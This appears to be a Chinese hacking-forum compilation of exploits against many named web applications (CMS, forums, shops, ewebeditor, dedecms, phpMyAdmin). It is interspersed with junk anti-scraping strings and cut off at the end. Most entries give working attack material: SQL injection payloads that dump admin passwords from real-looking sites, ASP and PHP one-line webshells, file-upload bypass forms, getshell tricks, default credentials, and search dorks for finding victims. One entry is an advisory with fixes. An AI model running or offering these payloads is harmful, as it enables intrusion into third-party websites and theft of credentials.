启航企业建站系统 cookie注入漏洞通杀所有版本3 s6 E, p* z s* {
' s9 u6 a) [, }) ?' l. Z: y
直接上exploit:
7 N& q M5 Q2 I9 V+ Hjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
, L& G1 I# E- @) R0 h/ Z( w1 o( V# W/ Etest:http://www.tb11.net/system/xitong/shownews.asp?id=210
* i4 ?0 R0 F' R v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' b. ?7 M b4 z0 c
Asprain论坛 注册用户 上传图片就可拿到webshell
6 L5 {# n v ^, ~5 K' K) ]7 P
1 E5 G" x( l3 y+ j. \Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。. Z$ U4 P- u/ f. [0 t& D9 e
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>& [( }4 j6 r; h+ e6 c7 [
2.gif 为一小图片文件,一定要小,比如qq表情图片
# x4 J' o) K: @4 p3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
. P$ ?0 o1 k4 j$ y4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了+ T4 o6 G3 X0 X5 L; Q. Y
5.q.asp;.gif
' N5 b) q) s6 |, P& J# C: Lgoogle:Powered by Asprain7 Y( B1 h$ z0 V( M5 S
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 y, v$ Y* g7 @/ k$ p
: F7 F' u& j, k0 g u2 m
ShopNum1全部系统存在上传漏洞。
5 h( o& r# G# I+ ~8 i- I% U' C" W( B* i/ c* g
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。! }% x- G* m# ~: m s9 K
按说明 提示登录后台。。5 O! i( g1 `2 U3 D! Q
在后台功能页面->附件管理->附件列表
; U4 R- b0 w( G可以直接上传.aspx 后缀木马
! _, j, y6 M2 z0 U3 Ahttp://demo.shopnum1.com/upload/20110720083822500.aspx
( ]0 ~ H: q& }- n1 y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
v/ I- z: m* `& |! J' X
2 T1 D0 X- b; L. M2 a- S+ ~牛牛CMS中小企业网站管理系统 上传漏洞6 Z! C* Z7 A" V3 x! F# h) z m K
; ?/ r, S. m3 b" T3 B牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。! f F9 C3 X/ d# B, R( }
后台:admin/login.asp
) r. t, l! X5 s& z* P0 O% cewebeditor 5.5 Nday
! }- s- Y% P- @, z l6 t/ `exp:4 u5 U( P3 h* |9 f' _
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
9 g$ ^/ Q' J; y p<input?type=file?name=uploadfile?size=100><br><br>?
. ^/ {5 r% N) ?: K8 l) k! B<input?type=submit?value=upload>?
G* H$ b3 H% i; n% W</form>
! a( A% C- S& g, u7 ^* Bps:先上传小马.
9 |; ]4 |* v! T& N- B+ minurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
! l; |- U b |
/ A2 N6 {$ K" A+ O/ ^1 m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ m3 _$ @4 I+ O$ g) l7 T7 I% \- z6 p% ^/ k. H
YothCMS 遍历目录漏洞% P& D$ Y% k; Y
5 V4 g+ r/ C8 v! }6 T
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
% S) q. R0 K, ^, h默认后台:admin/login.asp
8 Z: y- a& t l7 z" i遍历目录:
! r) H5 z9 o9 J+ i* c1 I! Hewebeditor/manage/upload.asp?id=1&dir=../, k+ C* Y% F5 D8 p! S
data:
; x" |) ?, m# p1 z% z _http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa7 Z9 X* K5 w. I2 V% `
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: t& f# \& j# z; ]" Y3 t/ A
" p. [. n- u. ~/ YNet112企业建站系统 1.0& Q& M/ f+ r2 \& R/ G
3 N. C4 O$ r" a
源码简介:% B9 Q, c% N3 u0 b( a
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。; }4 r, ~! b% ?& b) O8 k# k/ B' _
添加管理员:
: d e+ l; {7 e9 @& g2 @$ B Phttp://www.0855.tv/admin/admin.asp?action=add&level=2
/ i$ M/ d, ]7 V) \: o4 y, D其实加不加都不是很重要,后台文件都没怎么作验证。, z& M q1 `- r
上传路径:
L& X! T) ^3 l3 y7 Ehttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200: G- G+ ~, P0 G; c/ a
http://www.0855.tv/inc/Upfile.asp?Stype=2- j( I) h+ [3 j& W
怎么利用自己研究。
* ^1 u: x3 ~8 D4 v. q- d遍历目录:
) _! A# | b# I: ]: ohttp://www.0855.tv/admin/upfile.asp?path=../..2 e; N/ R$ b9 t# G, L# s
如:8 F/ Z' A2 [/ I6 Y- V0 k
http://www.0855.tv/admin/upfile.asp?path=../admin
+ N0 ?2 \: Y; G1 e" r6 r# ~http://www.0855.tv/admin/upfile.asp?path=../data
% U K( ]( i4 p" O7 b9 M--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 J' S- I; M: a! R0 t8 ]
& i" U* f+ J1 C; D2 s5 y7 |
易和阳光购物商城通杀 上传漏洞
! @9 E& j% Z, P& @+ y
' c) p2 l! Q8 Z) N7 ?$ z4 F前提要求是IIS6.0+asp坏境。
) X0 [4 }/ b" {2 i! S漏洞文件Iheeo_upfile.asp , b7 v) X- {5 u% E+ E4 N2 I
过滤不严.直接可以iis6.0上传7 k& Q' W5 X) ?8 F3 K1 q. {, e5 v2 ^
把ASP木马改成0855.asp;1.gif
# A; W" p! G% s. I4 c6 L" j1 v2 {直接放到明小子上传
3 d4 Q' S# l1 D3 C8 \, R3 ZGoogle搜索:inurl:product.asp?Iheeoid=
& k/ j: i5 N" k1 X8 O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 F$ T$ B# g. W
3 g. X- |" D- ]( {- o" g4 `! T- mphpmyadmin后台4种拿shell方法
6 E/ f* e: G, H+ p% j
% Y1 r% ?8 T7 P; f c6 \: Y8 J方法一:
3 a# K" S; j" E& WCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );, b8 t% R" W8 i; r* g
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');& l3 m0 `7 u+ @' D5 d4 r" n4 O% N
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';3 r4 ~$ ^% k$ A
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php: c L: f3 P) l# U p i
一句话连接密码:xiaoma
2 [) s( {& s# p- x) X1 f方法二:4 A7 B+ T6 L7 k* j' C4 |
Create TABLE xiaoma (xiaoma1 text NOT NULL);
& k* Z* v% O& jInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
" O) X' k9 s6 C3 j0 [, p- B4 Cselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
2 t/ _2 ?) ?+ JDrop TABLE IF EXISTS xiaoma;* C8 W" f% K! W1 B- M. [
方法三:, G5 N" u$ ^! w
读取文件内容: select load_file('E:/xamp/www/s.php');
& M2 L/ ~3 N8 y' y' C9 u写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
: w# O5 V& }' q/ y `cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'6 x9 y ~0 W8 s5 I9 v" ], O
方法四:6 o" h, Q% Q; M# k
select load_file('E:/xamp/www/xiaoma.php');
# X5 [3 R. g; U5 H6 F7 aselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'- y1 v% o) {- K1 m, h* a7 n2 h
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
, @- M7 T* y. H! Q2 m- J, N--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; `8 W$ W/ {( ^
* N5 [) s) m6 ]" T4 r* u, O传信网络独立开发网站源码0day漏洞7 y8 |: w- _. y, O. m8 E, i+ U
" L' Q7 g) ~. }' q4 }) M& j- s
后台system/login.asp
, |3 R& W3 [& W; I" t; L5 d/ H进了后台有个ewebeditor
4 @ @( V: b# Q: c4 u# u) W. ]+ tGoogle 搜索inurl:product1.asp?tyc=
; Q. O. W/ Z8 q u$ j4 f5 M编辑器漏洞默认后台ubbcode/admin_login.asp
6 ]# D9 |5 F3 L% J% P( p" Y2 P数据库ubbcode/db/ewebeditor.mdb$ t |- b$ f7 L/ t& i7 J) B6 {5 S
默认账号密码yzm 111111
; s) t) b* ^, b/ U7 ]
5 ~# h X# \, y+ w) c拿webshell方法9 N6 L5 J% q8 k0 N
登陆后台点击“样式管理”-选择新增样式 " h9 P4 P9 a& s
样式名称:scriptkiddies 随便写 5 N0 i# _3 ]& ]3 \
路径模式:选择绝对路径 & l z- V' U; w) Y9 l
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
( {7 v1 G' |& K. {/ o图片类型比如就是我们要上传的ASP木马格式
/ ?- f2 {9 s L7 _上传路径:/
; ]+ M% P4 z% L' I# w2 e: ~. F0 v% _图片限制:写上1000 免的上不了我们的asp木马* Z# Y( f: t9 R. H
上传内容不要写1 }# x% n8 H" B" l; i
可以提交了 & v4 T) h" u2 J$ O7 V; H
样式增加成功! & U& R& q) Z& M& l0 C8 A
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 6 y/ M: \3 R/ N! U/ `9 z/ t% Z! F
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置- ~, V& i! o. e! n/ X
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies7 O) J* |0 `$ f' F( J, F4 P
上ASP木马 回车 等到路径
$ N3 ~( ` ` j8 g
V G/ D9 j' o, h v后台:system/login.asp5 `( o% u8 H. _$ U
Exp:2 f9 k a( o* Y" @" A. K
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master& J$ H! H& t( F# q- Q& F
测试:
9 Z9 V* T+ n6 v/ T+ D4 N9 }http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
5 b0 s, b2 H9 n+ l/ h) H, _http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
|. V" b- X J/ ^--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( k, T1 Q3 n" Q* A, `
3 W6 `2 V3 m7 `/ V1 }( Pfoosun 0day 最新注入漏洞
# L6 Y9 }! I" P( [ l( I! c# s, @, x! T
漏洞文件:www.xxx.com/user/SetNextOptions.asp. T7 Q& g4 Z2 e8 n( j& @ S
利用简单的方法:" {7 y* ~ u) D
暴管理员帐号:$ I" E* D+ x- Q5 @2 w* e
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin. O! g) ]: _, k0 M, a) H% c
暴管理员密码:
) e9 d1 F4 T& T3 }$ V: ?. r* chttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,( K+ S2 E0 i! k0 w8 @7 t) a3 |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# _" z9 @- y3 b- `6 N# z1 O# k
8 L1 e! S! i E1 ~ ?网站程序的版权未知!
. r" m* }. [! x8 w3 y; p% R2 V* Y) e/ y# p- z6 \3 i
默认网站数据库:7 Z1 k' W8 F& e
www.i0day.com/data/nxnews.mdb
8 p! S( U2 g' x) Uewebeditor 在线编辑器:/ Z4 C+ _* y+ Y
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb. r! d/ S# a/ J. [# x
登录地址:ewebeditor/admin_login.asp+ U1 O9 j0 U `
默认密码:admin admin
0 ?& ^ B: B2 h4 K7 F登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data, w' a8 r; G" N7 Z7 _* v# @! `
m1 n5 h, U/ _" j. H: T6 ySql注入漏洞:
+ c* v0 _( G( S/ T6 thttp://www.i0day.com/detail.asp?id=12 y. w G( Y0 G' B; u8 v) a- I
exp:
, L1 A0 h$ J8 ^- g3 T! punion select 1,admin,password,4,5,6,7,8 from admin
7 L5 Y) l+ g. S9 F爆出明文帐号/密码
0 f4 k6 J. ~: X; ~; {
' V; F- D( B+ A上传漏洞:6 a' C3 x7 m# C0 s, {+ O
后台+upfile.asp, s) U+ b2 B9 J) m# c0 A
如:' v. I$ x( |3 w) O2 i* \
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
0 B0 F6 P1 e- {( ^7 dshell的地址:网址+后台+成功上传的马7 N4 A( i+ ]' T- \' Y+ @( U
google:inurl:news.asp?lanmuName=
- n {) \3 u9 g! S------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- [- v* Y, M3 L5 |" V9 i) E ]5 H2 Y/ _1 r
dedecms最新0day利用不进后台直接拿WEBSHELL
/ G: I5 W0 M9 P; ?& E- F7 I: Q+ |+ }$ _, m1 i3 O& e( J# N, X9 h
拿webshell的方法如下:" a" l W- n4 L2 P# E! ~
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.7 S. {+ ]* Q7 x( R e
前题条件,必须准备好自己的dede数据库,然后插入数据:
7 {# [" F4 i. i* [% J6 `insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); $ t: A, M& [6 W8 v& T1 n, R
* R% E! D2 R: c0 H# m再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。5 }0 ^ |! G. C5 o) v( x6 o& @
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">; E3 G" V4 B) Y; t) d: A0 s9 g
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
. a. h; [+ E4 y<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />/ {& c- S. J$ b, ~" K* r
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
y5 W6 a/ W& c! K5 Q% Y, y<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />9 O* h/ {4 m. L7 k
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />) p* s6 q/ R8 j/ F& Z
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
- [5 }, z9 J8 j/ q r5 N/ u<input type="text" value="true" name="nocache" style="width:400">0 ~. H5 p( @/ d* W
<input type="submit" value="提交" name="QuickSearchBtn"><br />! ]" H k* S3 S. ^ [
</form>
- \, S& V% ]% u<script>$ b" f% `- F2 T: W0 Q2 Y6 \
function addaction()" i/ B8 B) y) q, }) A$ h9 Q. ]
{" [5 b% q4 E% ?, k' |! D
document.QuickSearch.action=document.QuickSearch.doaction.value;
7 K3 _2 \1 M' r9 E G}9 L; F. @1 S$ U" x& ]4 E# q
</script>
& G. N( |7 d2 m-----------------------------------------------------------------------------------------------------------------------------------------------
& o5 q) b- o3 T# F0 ^+ ~+ p* Z/ [+ ^7 C" W
dedecms织梦暴最新严重0day漏洞
2 ~, }$ M! ?# c5 r! P; I8 u! y6 tbug被利用步骤如下:
6 _. Q9 l% h8 j$ _$ Whttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
! U& ]1 a6 D& S% Y- b+ a把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
- R3 i! {; i6 k0 B' H% s- d-------------------------------------------------------------------------------------------------------------------------------------------
+ u1 u& o- m2 Y& M7 f% z
9 |5 z: N& I- |多多淘宝客程序上传漏洞 ) Y7 i- G) {, |0 k4 x* n( _
漏洞页面:
% ]: S1 k% D- S6 X. ?- Gadmin\upload_pic.php
7 Z4 O- j+ \& k$ c传送门:
# N" H( @* J- p' u1 T. Hhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
4 ~- g( W- C" T$ K9 r+ uPS:copy张图片马 直接 xxx.php 上传抓包地址!
7 U1 _1 ~% c& W- r( c: z, j8 H! {------------------------------------------------------------------------------------------------------------------------------------------------------6 P) w- g! L* K0 p6 e* A; K
$ z* B+ z/ p* S: e# j( c无忧公司系统ASP专业版后台上传漏洞
* H2 l0 Q/ X) f漏洞文件 后台上传
1 A F/ Z9 e0 ]+ fadmin/uploadPic.asp
+ Z' p! \3 X& D( ^' Q漏洞利用 这个漏洞好像是雷池的 X$ L& _: T2 t
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
, Q8 }0 v4 \7 g# G" h }等到的webshell路径:9 X/ N7 z4 ^( d) ]2 g6 C2 H
/UploadFiles/scriptkiddies.asp;_2.gif! C+ z/ f% [7 x5 R% o9 Q8 F* x+ L
---------------------------------------------------------------------------------------------------------------------------------------------------
, P( Z% q: n/ b( ~% r8 w1 j9 g3 B' i# }9 I& E Y3 f; `
住哪酒店分销联盟系统20104 t2 Y. M" I# H& k6 F* D
Search:, B& E" ?, r8 L X) _
inurl:index.php?m=hotelinfo3 v- i' _( Q; ]
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin8 s$ I0 R, \1 i8 W, W1 h2 B
默认后台:index.php?m=admin/login
9 ^& B. Q3 N" z( C--------------------------------------------------------------------------------------------------------------------------------------------------
! f" B$ `. I1 j; w5 W, j% J6 `
( \! L# T! S, t6 T" z. b. Einurl:info_Print.asp?ArticleID=
& U8 t' H& ~: M9 T8 I' B, N后台 ad_login.asp# C9 t8 e4 \" r% T7 l" t9 A. ~
爆管理员密码:2 @" v3 \" c' l! v _
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin7 S/ \! p0 v4 \$ G: u# p) _, P
------------------------------------------------------------------------------------------------------------------------------------------------------------3 z, z, y0 c) C. P! l2 t
7 d' P" }- { f d+ }' p r6 J搜索框漏洞!
! A# h- ~1 `$ C% M/ w4 {4 \%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='1 X& O5 @3 H+ M6 X# F' }5 ?
--------------------------------------------------------------------------------------------------------------------------------------------------------
$ J7 F; ^) P8 ^7 [ f$ y
4 d' n, q' T- V4 ^: P8 U8 m+ y关键字:
- g6 T5 N+ m7 k9 w& |* K* D( o& s' cinurl:/reg_TemletSel.asp?step=21 b W1 V( j4 j8 ]/ L
或者: H) _3 N: u" z5 W) q
电子商务自助建站--您理想的助手, H5 q& _: m# u0 U/ |
-------------------------------------------------------------------------------------------------------------------------------------------------) C( F+ E! }* b5 D) D" z1 r
8 |& D& K* E8 h0 F& IiGiveTest 2.1.0注入漏洞8 ~, i) B- x' [5 m+ g* W; |
Version: <= 2.1.0" E, l5 Z3 n+ Y9 \0 }9 \
# Homepage: http://iGiveTest.com/
4 t7 G! U# b7 O谷歌关键字: “Powered by iGiveTest”" \2 e/ i2 c/ N2 u2 `% \
随便注册一个帐号。然后暴管理员帐号和密码0 U2 y$ ]9 `3 |! ^
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (18 b% n' j# E& G
------------------------------------------------------------------------------------------------------------------------------------------------ ?( A) y# m- h% p" h3 {4 N
3 m* \$ C8 x" P. p1 |' B/ @CKXP网上书店注入漏洞7 C6 \' b0 \" a# N
工具加表:shop_admin 加字段:admin, r/ w; [3 a7 ^3 @' v, g, \
后台:admin/login.asp # b1 O# n6 Q# U9 X, k& X& Q
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
4 r& D% p/ Q5 |( b: N/ ^inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息# @- |8 h& T+ }' d7 f: J! ~" N0 Q+ ?
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( R# q6 _5 ]* e J; M0 }. d2 w6 u5 q
, p$ F$ i8 R+ H段富超个人网站系统留言本写马漏洞5 F( N" F6 U) e" Q! ^7 q
源码下载:http://www.mycodes.net/24/2149.htm
`' R5 W* H1 ]* y; I1 [0 s3 {addgbook.asp 提交一句话。
5 b' G* _* L' }; @连接: http://www.xxxx.tv/date/date3f.asp7 {0 ~$ }3 L4 U/ w# l
google:为防批量,特略! x6 b/ Z* N6 {: F/ `: f, [
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------, o8 u0 H) i& a! A9 m& ~% z0 g" @
4 @$ c4 a+ {" s5 x4 `智有道专业旅游系统v1.0 注入及列目录漏洞, L: W2 s& d/ ]% e2 e8 L6 l
默认后台路径:/admin/login.asp
( W% Y9 s* {2 }7 b默认管理员:admin
) x( P# R1 |( H! n默认密码:123456- I, b: C* q3 B2 p3 L7 t. Y. Q
SQL EXP Tset:# P% z! D. U1 z) m
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
6 @3 c6 l' Q* d( g------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 j$ {; ?' \$ E0 i5 C, \! i9 c
' G* S( D2 F' T; M: q2 ~2 [$ k0 wewebeditor(PHP) Ver 3.8 本任意文件上传0day
8 O+ j' }# a/ y+ J" gEXP:
* W" a D) `$ w% s0 D<title>eWebeditoR3.8 for php任意文件上EXP</title>: g* G2 o2 _1 \1 @! c
<form action="" method=post enctype="multip" b8 @! q$ a3 D
art/form-data">
: |, Q1 s3 @/ R! I5 L1 T5 b6 S<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
1 W2 `6 J: F0 p. O5 r6 kURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ' |8 W, k& X0 x' u) M; ~
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> % h: x8 m( s% M7 v' S. S |
file:<input type=file name="uploadfile"><br>
4 V2 v5 d3 d) h/ C) h0 Y; z<input type=button value=submit onclick=fsubmit()>
" X- P2 g8 X" {- z4 m. y3 r/ p, y& E</form><br> ) ]0 n4 F$ f/ `3 b3 Y
<script>
2 r0 g* H. j* M' j T/ f, ?- vfunction fsubmit(){ $ q4 I- o7 }5 c4 P, p) h& s
form = document.forms[0]; ( ]; e5 g6 c2 ^$ X5 L& b
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
* U/ E8 u5 S/ d# S7 d% L7 Palert(form.action); , w& P' Q, q- N1 A9 }
form.submit();
* f& v1 q& y9 z7 n} - x4 r7 i; _2 f+ G5 W Y2 n2 X
</script>
- q/ U) z) E3 a& P注意修改里面ewebeditor的名称还有路径。
% ?, z: y5 T& W4 y& u---------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 D$ w$ m1 F0 x5 K
# s, O9 n; T7 \! o7 x1 i+ R# k$ e提交’时提示ip被记录 防注入系统的利用- }/ U; I: M% f# L& i5 u8 k+ M
网址:http://www.xxx.com/newslist.asp?id=122′
6 ~( f& |3 f9 g) y% `6 Q& D提示“你的操作已被记录!”等信息。- y1 S1 {& Y3 V1 l- F- C
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
- J! l+ {3 Z) p/ r8 L( J# i-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------* \& c9 y5 s7 s/ k5 ]
: b' |+ t: q/ Z- u6 c
西部商务网站管理系统 批量拿shell-0day
( N; j: A. [9 E' ~ |2 f这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 3 U6 h' N+ W* N* ]5 S
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
1 L# h. w& B' ^2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
# u+ H( f9 B% m3 I3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
' a0 {6 d0 p/ b---------------------------------------------------------------------------------------------------------------------------------------------------------------------------: X2 T4 N$ q7 j7 H& Q
# X ` H2 z: l2 z. u0 o8 {JspRun!6.0 论坛管理后台注入漏洞: o2 v, G {. F4 r5 @' L/ y
9 r& Q* L& z6 y2 L( g7 X
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:& R- K2 {4 _7 P
JspRun!6.0 ; o! _0 \6 W* D$ a/ L$ N
漏洞描述:+ s, C& ]( T2 P6 b$ W n
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。6 h! B+ D% B j3 P& S, |
在处理后台提交的文件中ForumManageAction.java第1940行
; M2 F+ S: N& E+ [5 A% eString export = request.getParameter("export");//直接获取,没有安全过滤
/ v A' g8 B. x9 l2 O4 z( o' w$ Iif(export!=null){9 x C6 L8 j7 ]" R4 r# i
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...8 u# K# ?0 M" @+ y' C9 h0 m
if(styles==null||styles.size()==0){0 h# {; m. b. u5 J& o! G
<*参考
9 u6 l: d+ o1 e) b3 lnuanfan@gmail.com
6 N' \0 f' v( ]' H( r% `*> SEBUG安全建议:
% B6 p- s# P# z- Lwww.jsprun.net
% s3 U: X8 A$ i9 t(1)安全过滤变量export
a' i4 q4 u2 ^6 d(2)在查询语句中使用占位符
8 K# `8 V* e2 O" x3 w. ^------------------------------------------------------------------------------------------------------------------------------------------------------------------------------* Q. ^1 |+ N8 ^2 Y! O
8 @' M( ^; ^ t. R$ J: p3 u0 H乌邦图企业网站系统 cookies 注入
- H) J) k: B8 |& f6 _/ ^9 d7 r
2 u1 i+ C1 Q& s' m3 `4 O Q& G4 i* r程序完整登陆后台:/admin/login.asp
; J0 k* k: j$ H( E- \$ M默认登陆帐号:admin 密码:admin888
* ]3 w' k' t7 |% _, ^' V' h- f# X" S语句:(前面加个空格)) S& D- K$ A, B% A" s' S
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin. O5 h3 z3 O& l# n: [
或者是16个字段:9 G" n7 I3 v5 j: W4 R2 l2 k$ z
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin& j0 w% M& W$ d5 X, S
爆不出来自己猜字段。
, Q. N1 R! [# Z$ m注入点:http://www.untnt.com/shownews.asp?=88
( x4 N" d) B0 `7 Z& r6 {getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp a Q$ H; V1 m1 [
关键字:
5 b! `6 i% {9 jinurl:shownews?asp.id=
1 h6 _# v d& O-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 h* I1 X: I$ x* @
2 A7 I/ w0 R' g& S& b6 s5 `8 z7 vCKXP网上书店注入漏洞8 \2 q+ P- A4 N; F
' p4 k; g# i, r工具加表:shop_admin 加字段:admin
4 I- ]6 F+ M4 y% ?( M后台:admin/login.asp
/ j8 ^ V( Q( f4 G: h t4 U1 |) d登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
- H, c) m4 c7 ?4 L7 C4 Minurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息7 ] O$ ^( P+ A1 m
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 A$ w* o' _! }! U, l
* S4 O4 ^. q" M% V; ]YxShop易想购物商城4.7.1版本任意文件上传漏洞" X0 h. S4 d* o y: i
# B1 w. h& v1 c7 W4 F0 d
http://xxoo.com/controls/fckedit ... aspx/connector.aspx. C2 i1 ~( C9 i% l) L# m( C- M
跳转到网站根目录上传任意文件。
1 Z2 _# J) \4 W6 N: K) c! e如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件1 X$ q8 X! W( ]. ^; d
